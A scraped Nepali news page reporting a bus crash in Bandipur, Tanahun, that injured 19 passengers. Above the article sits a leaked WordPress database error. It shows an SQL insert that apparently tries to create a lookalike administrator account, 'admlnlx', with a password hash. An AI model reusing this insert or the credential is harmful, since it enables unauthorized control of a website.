WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BlFcDZNJDqL/8f395zAMz472urJX0E1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-28 23:26:27', '', 'admlnlx', 'admlnlx')

नारायणगढबाट बाग्लुङको लागि छुटेको बस बन्दीपुरमा दुर्घटना १९ जना घाइते – Gaule Khabar

नारायणगढबाट बाग्लुङको लागि छुटेको बस बन्दीपुरमा दुर्घटना १९ जना घाइते

नारायणगढबाट बाग्लुङको लागि छुटेको बस बन्दीपुरमा दुर्घटना १९ जना घाइते

गाउँले न्युज, १९ साउन, काठमाण्डौ । चितवनको नारायणगढबाट बाग्लुङ जाँदै गरेको तनहुँको बन्दीपुर गाउँपालिका-५ ढाँपमा आज आइतबार विहान बस दुर्घटना हुँदा १९ जना घाइते भएका छन् ।
तनहुँको बन्दीपुर गाउँपालिकामा बा ४ ख ५९८८ नम्बरको बस अनियन्त्रित भएर दुर्घटना हुँदा बसमा सवारी १९ यात्रु घाइते भएको इलाका प्रहरी कार्यालय डुम्रेले जानकारी दिएको छ ।
घाइते मध्ये २ जनाको अवस्था गम्भीर छ । १ जनालाई थप उपचारका लागि पोखरा पठाइएको स्थानिय प्रहरी कार्यालयले जनाएको छ । अन्य १८ जना घाइतेको लक्ष्मी अस्पताल डुम्रेमा नै उपचार भैरहेको छ । बसमा ३३ जना यात्रु सवार थिए ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका